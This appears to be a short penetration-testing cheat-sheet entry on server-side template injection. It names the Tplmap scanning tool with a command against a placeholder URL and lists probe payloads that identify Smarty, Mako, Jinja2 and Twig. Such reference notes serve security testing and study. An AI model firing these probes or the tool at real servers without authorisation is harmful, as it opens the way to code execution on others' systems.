SSTI (Server-Side Template Injection)
Last modified: 2022-12-01
Web
Automation
Tplmap is a program for Server-Side Template Injection and Code Injection.
./tplmap.py -u http://vulnerable.com/?name=test
Identify the Template Engine
a{*comment*}b -> Smarty
${"z".join("ab")} -> Mako or ???
{{ '7'*7 }} -> Jinja2 or Twig or ???